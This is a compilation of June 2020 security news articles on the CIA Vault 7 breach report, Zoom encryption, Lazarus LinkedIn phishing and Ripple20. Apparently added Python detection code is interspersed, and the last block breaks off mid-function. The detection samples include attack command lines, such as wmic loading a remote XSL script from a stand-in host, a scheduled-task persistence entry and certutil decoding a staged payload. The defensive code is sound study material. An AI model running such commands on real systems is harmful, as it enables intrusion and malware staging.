“We must care as much about securing our systems as we care about running them if we are to make the necessary revolutionary change.” -CIA’s Wikileaks Task Force.
So ends a key section of a report the U.S. Central Intelligence Agency produced in the wake of a mammoth data breach in 2016 that led to Wikileaks publishing thousands of classified documents stolen from the agency’s offensive cyber operations division. The analysis highlights a shocking series of security failures at one of the world’s most secretive entities, but the underlying weaknesses that gave rise to the breach also unfortunately are all too common in many organizations today.
The CIA produced the report in October 2017, roughly seven months after Wikileaks began publishing Vault 7 — reams of classified data detailing the CIA’s capabilities to perform electronic surveillance and cyber warfare. But the report’s contents remained shrouded from public view until earlier this week, when heavily redacted portions of it were included in a letter by Sen. Ron Wyden (D-Ore.) to the Director of National Intelligence.
The CIA acknowledged its security processes were so “woefully lax” that the agency probably would never have known about the data theft had Wikileaks not published the stolen documents online. What kind of security failures created an environment that allegedly allowed a former CIA employee to exfiltrate so much sensitive data? Here are a few, in no particular order:
Failing to rapidly detect security incidents.
Failing to act on warning signs about potentially risky employees.
Moving too slowly to enact key security safeguards.
A lack of user activity monitoring or robust server audit capability.
No effective removable media controls.
No single person empowered to ensure IT systems are built and maintained securely throughout their lifecycle.
Historical data available to all users indefinitely.
Substitute the phrase “cyber weapons” with “productivity” or just “IT systems” in the CIA’s report and you might be reading the post-mortem produced by a security firm hired to help a company recover from a highly damaging data breach.
A redacted portion of the CIA’s report on the Wikileaks breach.
DIVIDED WE STAND, UNITED WE FALL
A key phrase in the CIA’s report references deficiencies in “compartmentalizing” cybersecurity risk. At a high level (not necessarily specific to the CIA), compartmentalizing IT environments involves important concepts such as:
Segmenting one’s network so that malware infections or breaches in one part of the network can’t spill over into other areas.
Not allowing multiple users to share administrative-level passwords
Developing baselines for user and network activity so that deviations from the norm stand out more prominently.
Continuously inventorying, auditing, logging and monitoring all devices and user accounts connected to the organization’s IT network.
“The Agency for years has developed and operated IT mission systems outside the purview and governance of enterprise IT, citing the need for mission functionality and speed,” the CIA observed. “While often fulfilling a valid purpose, this ‘shadow IT’ exemplifies a broader cultural issue that separates enterprise IT from mission IT, has allowed mission system owners to determine how or if they will police themselves.”
All organizations experience intrusions, security failures and oversights of key weaknesses. In large enough enterprises, these failures likely happen multiple times each day. But by far the biggest factor that allows small intrusions to morph into a full-on data breach is a lack of ability to quickly detect and respond to security incidents.
Also, because employees tend to be the most abundant security weakness in any organization, instituting some kind of continuing security awareness training for all employees is a good idea. Some security experts I know and respect dismiss security awareness programs as a waste of time and money, observing that no matter how much training a company does, there will always be some percentage of users who will click on anything.
That may or may not be accurate, but even if it is, at least the organization then has a much better idea which employees probably need more granular security controls (i.e. more compartmentalizing) to keep them from becoming a serious security liability.
This entry was posted on Wednesday, June 17th, 2020 at 7:37 pm and is filed under A Little Sunshine, Data Breaches.
A woman accused of setting fire to two Philadelphia police cars during a May 30 protest was tracked down by her online buying habits and reviews, a social media sweep, and a poor username choice, the FBI has claimed.
In an affidavit spotted by Seamus Hughes, deputy director of the Program on Extremism at George Washington University, FBI Special Agent Joseph Carpenter details the data trail that led agents to Lore-Elisabeth Blumenthal, 33.
The affidavit describes how the FBI obtained a video clip of a live news feed of the unrest in Philly that allowed investigators to get a general sense of a masked subject’s gender, race, clothing, and accessories. A subsequent video obtained from Vimeo by Homeland Security showed the alleged arson in more detail along with the masked person.
Carpenter also viewed an Instagram photo depicting the incident, a woman throwing a flaming object at a police car. The FBI then contacted the Instagram account owner who provided several relevant pictures from the scene. One of the images depicts a partial tattoo of a stylized peace sign on the woman’s right forearm.
The FBI also obtained 500 images from an amateur photographer who had documented the protest. Among them was a photo of a woman, in mask and goggles, with a similar tattoo and a T-shirt bearing the words, “KEEP THE IMMIGRANTS, DEPORT THE RACISTS.”
Carpenter notes that the videos and images depict the woman wearing what he and his colleagues believe are flame-retardant gloves, which in conjunction with her goggles, he argues, represent “evidence of intent and planning to engage in activities that could potentially hurt her hands and/or eyes, including arson.”
Investigators found that T-shirt for sale from a vendor on e-commerce site Etsy and spotted a user display name that had left a comment on the T-shirt sale page thanking the merchant for fast shipping. The Etsy customer’s profile page listed Philadelphia as the user’s location and an Etsy username, alleycatlore, that proved less anonymous than the message board display name because it incorporated part of her legal name.
Conducting an “open-source search” for that account name – aka googling the term – led investigators to a user of fashion site Poshmark with the display name “lore-elisabeth.” Searching for “Lore Elisabeth” in Philadelphia led to the LinkedIn account of a massage therapist under that name in the US city. The woman’s LinkedIn photo was matched against a Pennsylvania Department of Motor Vehicles photo of Lore Elisabeth Blumenthal.
Four-year-old videos on the massage therapy company website show the arm of an individual with less extensive tattoos than seen in the protest photos but apparently the same stylized peace sign in the same location.
Investigators then obtained a phone number and an address, and were able to match the shipping data from the Etsy T-shirt seller to Blumenthal’s residence.
US Attorney for the Eastern District of Pennsylvania William M. McSwain in a statement said the US Attorney’s Office supports the right to peaceful protest but that doesn’t extend to burning police cars. “Anybody who engaged in such acts can stand by to put your hands behind your back and head to federal prison,” he said. “We are coming for you.”
If convicted, Blumenthal, who was collared by the Feds and charged with arson, could face as much as a decade in prison and a fine of up to $250,000. ®
Zoom today said it will make end-to-end (E2E) encryption available to all of its users, regardless of whether they pay for it or not.
The videoconferencing overnight-sensation has walked back its initial plan to limit E2E cryptography to schools and paid-for accounts, after facing a storm of criticism for the restriction. It will, from next month, offer strong E2E encryption (E2EE) as a beta to any free account holder willing to hand over their contact number, as well as offering it to enterprise customers. We note that Google Meet and other rival services do not offer E2EE.
“Today, Zoom released an updated E2EE design on GitHub,” Zoom CEO Eric Yuan said. “We are also pleased to share that we have identified a path forward that balances the legitimate right of all users to privacy and the safety of users on our platform.
“This will enable us to offer E2EE as an advanced add-on feature for all of our users around the globe – free and paid – while maintaining the ability to prevent and fight abuse on our platform.”
It should be noted that Zoom already encrypts calls in transit with AES-256-GCM cryptography, but that isn’t truly end-to-end: E2EE ensures only the meeting participants, and no one else, can encrypt and decrypt the video, voice, and other data flowing between them during a confab. Zoom points out that this encryption won’t work on PSTN phone lines. This also excludes SIP/H.323 commercial conferencing gear.
Earlier this year, Yuan argued that Zoom couldn’t protect free calls with E2EE because to do so would thwart important law enforcement operations.
“Free users, for sure, we don’t want to give that because we also want to work together with FBI, with local law enforcement in case some people use Zoom for a bad purpose,” Yuan told analysts back in April.
In May, Zoom asked for help from digital rights groups who, apparently, told them to stop messing about and give people encrypted calls, law enforcement concerns be damned.
“Since releasing the draft design of Zoom’s end-to-end encryption (E2EE) on May 22, we have engaged with civil liberties organizations, our CISO council, child safety advocates, encryption experts, government representatives, our own users, and others to gather their feedback on this feature,” Yuan said today.
To satisfy the legal issues and requirements, Zoom is asking users to verify their phone numbers by entering a single-use code delivered via text message. “Many leading companies perform similar steps on account creation to reduce the mass creation of abusive accounts,” Yuan said. “We are confident that by implementing risk-based authentication, in combination with our current mix of tools — including our Report a User function — we can continue to prevent and fight abuse.”
Needless to say, Zoom has taken no shortage of heat for its handling of security issues since the coronavirus lockdown made the service a household name and brought the upstart under scrutiny.
In response, Zoom moved to bring in the likes of ex-Yahoo! and Facebook CSO Alex Stamos and Luta Security and its founder Katie Moussouris to get its protections up to snuff. ®
Webcast: You know your attack surface, don’t you? You mapped all of it? Are you sure?
Today, 38 per cent of business workloads run in cloud environments. You may use hundreds of SaaS applications, and be connected to subsidiaries and partner networks. Your business has been kept on track in the past month by remote workers, the cloud, and your partners. Now their vulnerabilities are your problem, because those are exactly the routes into your organisation that an attacker will target and exploit.
But how can you map the entire attack surface and prioritise the most important vulnerabilities, when statistics show you are only aware of 70 per cent of it at best, and tools like port scanners pump out lists of IP addresses without any business context or prioritisation?
Join our webcast on June 18 at 1000 PDT (1300 EDT) where Rob Gurzeev, CEO of CyCognito, explains to The Reg’s Tim Phillips how CISOs can:
Discover and map their entire attack surface, including subsidiaries and partner IT
Find the hidden “shadow risks” that smart hackers exploit
Link attack vectors to business context to prioritize the most important actions
Manage the organization’s security posture by thinking like an attacker
Sign up here for the webcast, brought to you by CyCognito, and join us tomorrow.
Security experts at Intego are warning Apple Mac users of a new in-the-wild malware threat, which masquerades as an installer for Adobe Flash Player.
The malware, which Intego says appears to be a variant of OSX/Shlayer and OSX/Bundlore, was found hiding on webpages after searching Google for the “exact titles of YouTube videos”:
While searching Google for the exact titles of YouTube videos, Intego’s research team encountered Google search results that, when clicked, pass through multiple redirection sites and end up on a page that claims the visitor’s Flash Player is out of date, and displays deceptive warnings and fake dialog boxes to entice the victim to download a supposed Flash Player updater—which is, in fact, a Trojan horse.
Using the disguise of an Adobe Flash Player update is hardly new for malware, even on Apple Macs, but what is more unusual is how the malware attempts to hide its activities from both the computer user and security software.
According to Intego’s chief security analyst Joshua Long, the bogus Flash installer app is in reality a bash shell script.
The malicious script spews out a password-protected .ZIP archive file, containing a malicious app that is installed in a hidden temporary folder. This app, in turn, downloads a legitimate installer for Flash Player digitally-signed by Adobe in an attempt to not arouse suspicion.
However, the malicious app also has the ability to download further malware and adware from command-and-control servers operated by whoever is orchestrating the attack.
Frankly, in the year 2020, you probably shouldn’t be installing any versions of Flash on your computer – whether they be legitimate or bogus. There are virtually no sites that still rely upon Flash, and even Adobe is keen for you to forget all about it.
Stop making life easy for cybercriminals. Ensure that you don’t have Adobe Flash lingering on any of your computers, and then you’ll know for certain that any prompts to update it can only be malicious. 🙂
And, of course, all Mac users should be running an up-to-date anti-virus program, and exercising caution about the software they install onto their computers.
Former British MP Emma Dent Coad was not very happy to hear from the NHS Wales Test and Trace service today. Not because the SMS text message she received told her that she had tested positive for the Covid-19 Coronavirus (it didn’t, and she hasn’t).
But rather because the SMS clearly was meant to go to someone else entirely.
On Twitter, the former Kensington MP didn’t hold back, expressing her concern that the SMS notification from NHS Wales of a negative test result had not only been clearly sent to the wrong phone number, but also that there was no obvious way to inform the service of the error.
Who the hell’s in charge of NHS text notifications?
NHS WALES has just informed me, in English and Welsh, that xxx (not me) has tested negative for CV19.
I’m delighted for xxx, but 1, WTAF, and 2, there is no way to respond!
In a screenshot shared on Twitter, Dent Coad – who is still a Labour councillor – revealed that the message exposed the patient’s name and full date of birth.
I suspect what’s happened here is simple human error. Either the person being tested doesn’t know their own mobile phone number (hey, don’t laugh. I don’t know my phone number. After all, why would I ever ring it?) or it was entered incorrectly by whoever registered the patient for the Coronavirus test.
It’s easy to imagine, for instance, that a couple of numbers may have been accidentally transposed.
The likelihood of an error like this occurring could perhaps be lessened by simply double-checking, or even sending a confirmation text to the number a patient has registered with the service, but… I guess these systems have been built in something of a hurry.
The worry is, of course, that some people are not going to receive information about their test status (positive or negative). At best that could be inconvenient and maybe a leak of personal information, but at worst it could increase the chances of the Coronavirus being spread to others.
Cybersecurity researchers today took the wraps off a new sophisticated cyber-espionage campaign directed against aerospace and military organizations in Europe and the Middle East with an aim to spy on key employees of the targeted firms and, in some cases, even to siphon money.
The campaign, dubbed “Operation In(ter)ception” because of a reference to “Inception” in the malware sample, took place between September and December 2019, according to a new report cybersecurity firm ESET shared with The Hacker News.
“The primary goal of the operation was espionage,” the researchers told The Hacker News. “However, in one of the cases we investigated, the attackers tried to monetize access to a victim’s email account through a business email compromise (BEC) attack as the final stage of the operation.”
The financial motivation behind the attacks, coupled with similarities in targeting and development environment, has led ESET to suspect Lazarus Group, a notorious hacking group that’s been attributed to working on behalf of the North Korean government to fund the country’s illicit weapons and missile programs.
Social Engineering via LinkedIn
Stating that the campaign was highly targeted, ESET said it relied on social engineering tricks to lure employees working for the chosen companies with fake job offers using LinkedIn’s messaging feature, posing as HR managers of well-known companies in the aerospace and defense industry, including Collins Aerospace and General Dynamics.
“Once the contact was established, the attackers snuck malicious files into the communication, disguising them as documents related to the advertised job offer,” the researchers said, based on an investigation with two of the affected European companies.
The decoy RAR archive files, which were sent directly over the chats or as emails from the fake LinkedIn personas pointing to a OneDrive link, purported to contain a PDF document detailing salary information for specific job positions. In actuality, they executed Windows’ Command Prompt utility to perform a series of actions:
Copy Windows Management Instrumentation command-line tool (wmic.exe) to a specific folder
Rename it to something innocuous to evade detection (e.g., Intel, NVidia, Skype, OneDrive and Mozilla), and
Create scheduled tasks that execute a remote XSL script via WMIC.
The actors behind the operation, upon gaining an initial foothold inside the target company, went on to employ a custom malware downloader, which in turn downloaded a previously undocumented second-stage payload — a C++ backdoor that periodically sends requests to an attacker-controlled server, carries out pre-defined actions based on the received commands, and exfiltrates the collected information as a RAR file via a modified version of dbxcli, an open-source command-line client for Dropbox. In addition to using WMIC to interpret remote XSL scripts, the adversaries also abused native Windows utilities such as “certutil” to decode base64-encoded downloaded payloads, and “rundll32” and “regsvr32” to run their custom malware.
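Detection logic for the tradecraft listed above, added here as an example and not taken from ESET’s report or tooling: it runs four checks over constructed process-creation records (renamed native utility, remote XSL via `/format:`, certutil used as a decoder, and rundll32/regsvr32 loading from a user-writable path). The record field names, the rule names and the `decoy.example` host are assumptions; the rundll32/regsvr32 rule generalises the report’s note that both tools ran the custom malware.

```python
"""Flag the living-off-the-land tradecraft ESET describes for Operation
In(ter)ception in process-creation telemetry. The sample records below are
constructed for this example; they are not from any real host."""
from __future__ import annotations
import re

# Native Windows utilities the report says were copied, renamed or abused.
NATIVE_UTILITIES = {"wmic.exe", "certutil.exe", "rundll32.exe", "regsvr32.exe"}
# Innocuous names the report says the copied wmic.exe was given.
DECOY_NAMES = {"intel", "nvidia", "skype", "onedrive", "mozilla"}

# wmic's /format switch pointing at a URL: a remote XSL script is fetched and run.
REMOTE_XSL = re.compile(r"/format\s*:\s*[\"']?(?:https?|ftp)://", re.IGNORECASE)
# certutil used as a base64/hex decoder rather than as a certificate tool.
CERTUTIL_DECODE = re.compile(r"(?<!\w)-decode(?:hex)?\b", re.IGNORECASE)
# User-writable locations from which rundll32/regsvr32 should rarely load code.
WRITABLE_PATH = re.compile(r"\\(?:ProgramData|Users|Temp|AppData)\\", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased final component of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze(event: dict) -> list[str]:
    """Return the names of every rule one process-creation event matches."""
    image = basename(event["image"])
    original = event.get("original_file_name", "").lower()  # from the PE version resource
    cmd = event.get("command_line", "")
    hits: list[str] = []

    # 1. A native utility whose on-disk name no longer matches the name compiled
    #    into its version resource (wmic.exe copied and renamed to Intel.exe).
    if original in NATIVE_UTILITIES and image != original:
        hits.append("renamed_native_utility")
        if image.rsplit(".", 1)[0] in DECOY_NAMES:
            hits.append("known_decoy_name")

    # 2. Any command line, including the /tr payload of a schtasks /create, that
    #    asks wmic to render its output through a remote XSL stylesheet.
    if REMOTE_XSL.search(cmd):
        hits.append("remote_xsl_format")

    # 3. certutil decoding a file instead of handling certificates.
    if image == "certutil.exe" and CERTUTIL_DECODE.search(cmd):
        hits.append("certutil_decode")

    # 4. rundll32/regsvr32 loading a module from a user-writable directory.
    if image in {"rundll32.exe", "regsvr32.exe"} and WRITABLE_PATH.search(cmd):
        hits.append("lolbin_from_writable_path")

    return hits


def scan(events) -> dict[int, list[str]]:
    """Map event id -> matched rules, for events that matched at least one rule."""
    return {ev["id"]: hits for ev in events if (hits := analyze(ev))}


# Constructed sample telemetry (hypothetical paths and host; not real data).
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\wmic.exe", "original_file_name": "wmic.exe",
     "command_line": "wmic os get caption /format:list"},                 # local format: benign
    {"id": 2, "image": r"C:\ProgramData\Intel\Intel.exe", "original_file_name": "wmic.exe",
     "command_line": 'Intel.exe os get /format:"https://decoy.example/update.xsl"'},
    {"id": 3, "image": r"C:\Windows\System32\schtasks.exe", "original_file_name": "schtasks.exe",
     "command_line": "schtasks /create /sc minute /mo 30 /tn OneDriveUpdate "
                     r'/tr "C:\ProgramData\OneDrive\OneDrive.exe os get /format:http://decoy.example/u.xsl"'},
    {"id": 4, "image": r"C:\Windows\System32\certutil.exe", "original_file_name": "CertUtil.exe",
     "command_line": r"certutil -decode C:\Users\Public\stage.txt C:\Users\Public\stage.dll"},
    {"id": 5, "image": r"C:\Windows\System32\rundll32.exe", "original_file_name": "RUNDLL32.EXE",
     "command_line": "rundll32.exe shell32.dll,Control_RunDLL"},           # system DLL: benign
    {"id": 6, "image": r"C:\Windows\System32\certutil.exe", "original_file_name": "CertUtil.exe",
     "command_line": "certutil -verify cert.cer"},                         # real cert use: benign
    {"id": 7, "image": r"C:\Windows\System32\rundll32.exe", "original_file_name": "RUNDLL32.EXE",
     "command_line": r"rundll32.exe C:\ProgramData\NVidia\nvhelper.dll,Start"},
]

if __name__ == "__main__":
    for event_id, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```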
“We actively seek out signs of state-sponsored activity on the platform and quickly take action against bad actors in order to protect our members. We don’t wait on requests, our threat intelligence team removes fake accounts using information we uncover and intelligence from a variety of sources, including government agencies,” Paul Rockwell, Head of Trust and Safety at LinkedIn said in a statement sent to The Hacker News.
“Our teams utilize a variety of automated technologies, combined with a trained team of reviewers and member reporting, to keep our members safe from all types of bad actors. We enforce our policies, which are very clear: the creation of a fake account or fraudulent activity with an intent to mislead or lie to our members is a violation of our terms of service. In this case, we uncovered instances of abuse that involved the creation of fake accounts. We took immediate action at that time and permanently restricted the accounts.”
Financially Motivated BEC Attacks
Besides reconnaissance, ESET researchers also found evidence of attackers attempting to exploit the compromised accounts to extract money from other companies.
Although unsuccessful, the monetization tactic worked by using the existing email communications between the account holder and a customer of the company to settle an outstanding invoice to a different bank account under their control.
“As part of this ruse, the attackers registered an identical domain name to that of the compromised company, but on a different top-level domain, and used an email associated with this fake domain for further communication with the targeted customer,” ESET said.
Ultimately, the targeted customer reached out to the correct email address of the victim about the suspicious emails, thus foiling the attackers’ attempt.
“Our research into Operation In(ter)ception shows again how effective spear-phishing can be for compromising a target of interest,” the researchers concluded.
“They were highly targeted and relied on social engineering over LinkedIn and custom, multistage malware. To operate under the radar, the attackers frequently recompiled their malware, abused native Windows utilities, and impersonated legitimate software and companies.”
The Department of Homeland Security and CISA ICS-CERT today issued a critical security advisory warning about over a dozen newly discovered vulnerabilities affecting billions of Internet-connected devices manufactured by many vendors across the globe.
Dubbed “Ripple20,” the set of 19 vulnerabilities resides in a low-level TCP/IP software library developed by Treck, which, if weaponized, could let remote attackers gain complete control over targeted devices—without requiring any user interaction.
According to Israeli cybersecurity company JSOF—who discovered these flaws—the affected devices are in use across various industries, ranging from home/consumer devices to medical, healthcare, data centers, enterprises, telecom, oil, gas, nuclear, transportation, and many others across critical infrastructure.
“Just a few examples: data could be stolen off of a printer, an infusion pump behavior changed, or industrial control devices could be made to malfunction. An attacker could hide malicious code within embedded devices for years,” the researchers said in a report shared with The Hacker News.
“One of the vulnerabilities could enable entry from outside into the network boundaries; this is only a small taste of the potential risks.”
There are four critical vulnerabilities in the Treck TCP/IP stack, with CVSS scores over 9, which could let attackers execute arbitrary code on targeted devices remotely, and one critical bug affects the DNS protocol.
“The other 15 vulnerabilities are in ranging degrees of severity with CVSS score ranging from 3.1 to 8.2, and effects ranging from Denial of Service to potential Remote Code Execution,” the report says.
Some Ripple20 flaws were patched by Treck or device manufacturers over the years as a result of code changes and stack configurability, and for the same reason many of the flaws also have several variants that apparently will not be patched anytime soon, not until vendors perform a comprehensive risk assessment.
CVE-2020-11896 (CVSS v3 base score 10.0): Improper handling of length parameter inconsistency in IPv4/UDP component when handling a packet sent by an unauthorized network attacker. This vulnerability may result in remote code execution.
CVE-2020-11897 (CVSS v3 base score 10.0): Improper handling of length parameter inconsistency in IPv6 component when handling a packet sent by an unauthorized network attacker. This vulnerability may result in possible out-of-bounds write.
CVE-2020-11898 (CVSS v3 base score 9.8): Improper handling of length parameter inconsistency in IPv4/ICMPv4 component when handling a packet sent by an unauthorized network attacker. This vulnerability may result in the exposure of sensitive information.
CVE-2020-11899 (CVSS v3 base score 9.8): Improper input validation in the IPv6 component when handling a packet sent by an unauthorized network attacker. This vulnerability may allow exposure of sensitive information.
CVE-2020-11900 (CVSS v3 base score of 9.3): Possible double free in IPv4 tunneling component when handling a packet sent by a network attacker. This vulnerability may result in remote code execution.
CVE-2020-11901 (CVSS v3 base score 9.0): Improper input validation in the DNS resolver component when handling a packet sent by an unauthorized network attacker. This vulnerability may result in remote code execution.
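As an added illustration (not from the JSOF report or from Treck’s code), the check below shows the class of defect the descriptions of CVE-2020-11896 to CVE-2020-11898 name: an IPv4/UDP stack that trusts one length field without cross-checking it against the others. `validate_ipv4_udp` and `build_ipv4_udp` are hypothetical names, and every packet is constructed in the block; the validator rejects any packet whose IHL, IP total length, UDP length and buffer length disagree before it touches the payload.

```python
"""Length-consistency checks for an IPv4 packet carrying UDP.

An IPv4/UDP packet carries four redundant lengths: the buffer actually
received, the IP header length (IHL), the IP total length and the UDP
length. A stack that trusts any one of them without checking the others
can read or write past the real packet. This validator cross-checks all
of them and only then slices out the payload."""
from __future__ import annotations
import struct

IPV4_MIN_HDR = 20   # 5 words, no options
UDP_HDR = 8
PROTO_UDP = 17


def validate_ipv4_udp(frame: bytes) -> tuple[bool, str, bytes]:
    """Return (accepted, reason, udp_payload). Inconsistent packets are rejected."""
    n = len(frame)
    if n < IPV4_MIN_HDR:
        return False, "buffer shorter than minimal IPv4 header", b""
    version, ihl = frame[0] >> 4, (frame[0] & 0x0F) * 4
    if version != 4:
        return False, "not IPv4", b""
    if ihl < IPV4_MIN_HDR:
        return False, "IHL below 5 words", b""
    # total length at offset 2, flags/fragment offset at offset 6
    total_len, flags_frag = struct.unpack_from("!HxxH", frame, 2)
    if total_len > n:
        return False, "total length exceeds buffer (truncated packet)", b""
    if total_len < ihl + UDP_HDR:
        return False, "total length cannot hold IP and UDP headers", b""
    if frame[9] != PROTO_UDP:
        return False, "not UDP", b""
    if flags_frag & 0x3FFF:            # MF flag set or non-zero fragment offset
        return False, "fragment: reassemble before parsing UDP", b""
    # Safe: ihl + 4 + 2 <= total_len <= n has been established above.
    udp_len = struct.unpack_from("!H", frame, ihl + 4)[0]
    ip_payload = total_len - ihl
    if udp_len < UDP_HDR:
        return False, "UDP length below UDP header size", b""
    if udp_len > ip_payload:
        return False, "UDP length exceeds IP payload length", b""
    payload = frame[ihl + UDP_HDR: ihl + udp_len]
    reason = "consistent" if udp_len == ip_payload else "consistent (IP padding ignored)"
    return True, reason, payload


def build_ipv4_udp(payload: bytes, *, total_len: int | None = None,
                   udp_len: int | None = None, ihl_words: int = 5) -> bytes:
    """Construct an IPv4/UDP packet, letting the caller override length fields
    to produce the inconsistent packets the validator must reject. Checksums
    stay zero: UDP permits it and this validator does not verify IPv4's."""
    ihl = ihl_words * 4
    options = b"\x00" * max(ihl - IPV4_MIN_HDR, 0)
    udp_total = UDP_HDR + len(payload)
    real_total = ihl + udp_total
    ip_hdr = struct.pack("!BBHHHBBH4s4s",
                         (4 << 4) | ihl_words, 0,
                         real_total if total_len is None else total_len,
                         0x1234, 0x4000,            # id; DF set, offset 0
                         64, PROTO_UDP, 0,
                         bytes([192, 0, 2, 1]), bytes([192, 0, 2, 2]))   # TEST-NET-1 addresses
    udp_hdr = struct.pack("!HHHH", 40000, 53,
                          udp_total if udp_len is None else udp_len, 0)
    return ip_hdr + options + udp_hdr + payload


if __name__ == "__main__":
    cases = {
        "consistent": build_ipv4_udp(b"hello"),
        "udp length too large": build_ipv4_udp(b"hello", udp_len=UDP_HDR + 500),
        "ip total length beyond buffer": build_ipv4_udp(b"hello", total_len=528),
        "ihl below minimum": build_ipv4_udp(b"x", ihl_words=3),
    }
    for name, pkt in cases.items():
        print(f"{name:32s} -> {validate_ipv4_udp(pkt)[:2]}")
```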
You can find details for the rest of the vulnerabilities in an advisory released by the U.S. government.
Cybersecurity researchers at JSOF responsibly reported their findings to Treck, which then patched most of the flaws with the release of TCP/IP stack version 220.127.116.11 or higher.
Researchers also contacted affected semiconductor and device manufacturing vendors, including HP, Schneider Electric, Intel, Rockwell Automation, Caterpillar, Baxter, and Quadros, many of which have already acknowledged the flaws; the rest are still assessing their products before going public.
“The disclosure was postponed twice after requests for more time came from some of the participating vendors, with some of the vendors voicing COVID-19-related delays. Out of consideration for these companies, the time period was extended from 90 to over 120 days. Even so, some of the participating companies became difficult to deal with, as they made extra demands, and some, from our perspective, seemed much more concerned with their brand’s image than with patching on the vulnerabilities,” the researchers said.
Since millions of devices will not receive security patches to address the Ripple20 vulnerabilities anytime soon, researchers and ICS-CERT have recommended that consumers and organizations:
Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
Locate control system networks and remote devices behind firewalls and isolate them from the business network.
Besides this, it’s also advised to use virtual private networks for securely connecting your devices to Cloud-based services over the Internet.
In its advisory, CISA has also asked affected organizations to perform proper impact analysis and risk assessment before deploying defensive measures.
The Incident Response (IR) services market is in accelerated growth due to the rise in cyberattacks that result in breaches. More and more organizations, across all sizes and verticals, choose to outsource IR to 3rd party service providers over handling security incidents in-house.
Cynet is now launching a first-of-its-kind offering, enabling any Managed Security Provider (MSP) or Security Integrator (SI) to add Incident Response to its services portfolio, without building an in-house team of incident responders, by using Cynet’s IR team and technology at no cost.
Managed service providers interested in adding Incident Response to their service portfolio with no investment in people or technology can apply here.
As cyber threats grow in sophistication and volume, there is an increasing number of cases in which attackers succeed in compromising the environments they target. This, in turn, fuels a rapidly growing demand for IR technologies and services.
Since in most cases the response to a suspected attack requires skills in fields such as forensics, reverse engineering and other investigation skills that are not part of the standard IT workforce’s expertise, many organizations prefer to put their trust in a professional 3rd party that specializes in providing IR services.
However, while the demand for IR services is high, only a small part of MSPs and SIs provide IR services. All others that provide standard IT and security services such as deployment, integration, and management, don’t offer IR services due to the difficulties in recruiting a team of skilled responders.
Cynet now launches a new offering, enabling existing IT and security service providers to add IR to their offered services cart without having their own in-house team of security experts.
With this offering, the service providers can sell IR services to their customers, and when an incident occurs, engage the Cynet CyOps security team, who install the Cynet 360 platform across the customer environment within minutes, and conduct a rapid and efficient investigation and response, until the environment is clean again.
On top of the explicit benefit of adding IR services to its offering with zero investment, after the incident response process is over, MSPs and SIs have the option to leverage the momentum of having Cynet 360 already deployed and working in the customer environment to showcase the full value proposition of the platform and sell the Cynet 360 breach protection platform on a yearly subscription basis.
CyOps is a team of handpicked security analysts and threat researchers that respond to events on a daily basis through Cynet’s Security Operations Center.
CyOps’ vast cybersecurity experience warrants rapid and efficient operation across environments of all types and sizes.
About Cynet 360:
CyOps uses Cynet 360 Autonomous Breach Protection as their default IR platform when engaging with an environment under attack.
Cynet 360 instantly collects and correlates all the endpoint, network and user data from the environment, enabling CyOps to pinpoint suspicious entities and connections, investigate to unveil root-cause, scope, and impact, and remove malicious presence and activity.
These responders’ expertise and Cynet 360’s cutting-edge IR technology magnify one another, to deliver IR with unmatched quality and efficiency.
Threat intel researchers have uncovered a phishing and malware campaign that targeted “a large European aerospace company” and which was run by the same North Koreans behind the hack of Sony Pictures.
While there are quite a few European aerospace firms, Slovakian infosec biz ESET was more concerned with the phishing ‘n’ malware campaign it detected on behalf of its unnamed client.
Branded “Operation Interception” by ESET, the researchers claimed the “highly targeted cyberattacks” were being spread by North Korean baddies Lazarus Group, who were behind the 2014 hack of Sony’s American entertainment business.
The threat group’s latest detected campaign involved targeting aerospace folk via LinkedIn, said the infoseccers. ESET researcher Jean-Ian Boutin explained: “In our case they were impersonating Collins Aerospace and General Dynamics (GD), two organisations in the same vertical as the targeted European organisations.” He said the Norks were targeting people who worked in “sales, marketing, tech, general admin” roles.
Collins and GD are two of the bigger names in North American aerospace; among other things, Collins makes avionic instruments and software while GD has fingers in pies ranging from the F-16 fighter jet through Gulfstream corporate aircraft, US Navy submarines and armoured vehicles. As bait dangled before honest people hoping to take a major step forwards in an aerospace career, these two companies were tempting lures.
“The [job] offer seemed too good to be true,” said Boutin as he explained the Lazarus ruse to The Reg. “Maybe [the recipient’s] career could take off in a big way?”
Once into a target’s network the criminals would try to brute-force any Active Directory admin accounts they could find, as well as exfiltrate data by bundling it into a RAR archive and trying to upload it to a Dropbox account.
After the victim had been suitably reeled in, Lazarus would try to induce them to download a password-protected RAR archive “containing a LNK file.” Once clicked, that LNK file appeared to the victim to download a PDF containing job information. In the background, however, it also downloaded a malicious EXE that created a bunch of folders and set a Windows scheduled task to run a remote script every so often.
ESET illustration showing the Lazarus Group attack progression
The attackers were most insistent that the victim only respond to their job offer on a Windows machine running Internet Explorer. Once in, they resorted to PowerShell – taking advantage of the fact that “the logging of executed PowerShell commands is disabled by default,” although evidence was found that the Lazarus crew went through the connected domain to enumerate all Active Directory accounts before trying to brute-force their way into admin accounts.
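An added example (not ESET’s or The Register’s code) of the detection a defender would want for the account enumeration and brute-forcing described above: it scans Windows Security event 4625 (failed logon) records for one source failing against many Active Directory accounts in a short window. The event records, account names, 10.0.0.x addresses and thresholds are all constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security event 4625 (failed logon) records; the keys
# stand in for the event's TimeCreated, TargetUserName and IpAddress fields.
ADMIN_ACCOUNTS = ["administrator", "svc-backup", "da-jsmith",
                  "helpdesk", "sql-admin", "it-ops"]
SAMPLE_EVENTS = [
    # 12 failures against 6 admin accounts from one host inside two minutes
    {"time": f"2020-04-01T09:{i // 6:02d}:{(i % 6) * 10:02d}",
     "target": ADMIN_ACCOUNTS[i % 6], "source": "10.0.0.7"}
    for i in range(12)
] + [
    # one user mistyping their own password three times: not an alert
    {"time": f"2020-04-01T09:30:{s:02d}", "target": "alice", "source": "10.0.0.20"}
    for s in (0, 5, 10)
]


def detect_spray(events, window=timedelta(minutes=5),
                 min_failures=10, min_accounts=5):
    """Return one alert per source whose failed logons inside some `window`
    reach both thresholds. Requiring several distinct target accounts is
    what separates enumeration/spraying from a single fumbled password."""
    by_source = defaultdict(list)
    for ev in events:
        by_source[ev["source"]].append(
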